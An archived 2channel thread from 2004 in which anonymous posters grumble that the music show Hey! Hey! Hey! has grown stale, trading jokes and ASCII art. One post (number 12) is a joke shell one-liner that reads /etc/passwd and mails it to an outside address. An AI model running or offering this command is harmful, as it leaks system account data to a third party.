2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

何かヘイヘイヘイってさ

1 :名無しでいいとも!:04/10/18 20:03:48 ID:8gA3Vvwy
毎週やってるのに
もう最終回になった昔の番組を見てる感覚にならないか?

なんつーか、たまにやるバカ殿様のスペシャル見てる時と同じような感覚というか

しないか?

2 :名無しでいいとも!:04/10/18 20:08:42 ID:3UO6C7P3
やらないか?

3 :名無しでいいとも!:04/10/18 20:13:23 ID:8gA3Vvwy
ウホッ

4 :名無しでいいとも!:04/10/18 20:14:08 ID:vVLWboDD
□□□□□□
□□□□□□<カタカタカタカタカタカタ

5 :名無しでいいとも!:04/10/18 20:16:04 ID:p5m4niDb
HEY HEY HEYも、うたばん化するな!!

6 :名無しでいいとも!:04/10/18 20:16:15 ID:T8J2k1/q
http://www.fujiint.co.jp/BBS/posttokp/read.cgi

7 :名無しでいいとも!:04/10/18 20:18:12 ID:jY2t+vus
つまんねー番組になったよな

8 :名無しでいいとも!:04/10/18 20:19:24 ID:6X6QJAQx
 _________________
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
|あゆ可愛いよあゆ|あゆ可愛いよあゆ|
―――――――――――――――――

9 :名無しでいいとも!:04/10/18 20:20:19 ID:mo3OVUj9
伊よとかのトークはいらないな。

10 :名無しでいいとも!:04/10/18 20:20:25 ID:WLi6zvDB
なんとかして欲しい

11 :名無しでいいとも!:04/10/18 20:21:45 ID:8gA3Vvwy
編集とか演出とか少し古いよな

12 :名無しでいいとも!:04/10/18 20:22:37 ID:Pg002byw
cat /etc/passwd | mail nobody@nonexistent.com

13 :名無しでいいとも! :04/10/18 20:22:38 ID:s1fzApHe
>>5
うたばんに失礼ですよ

2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)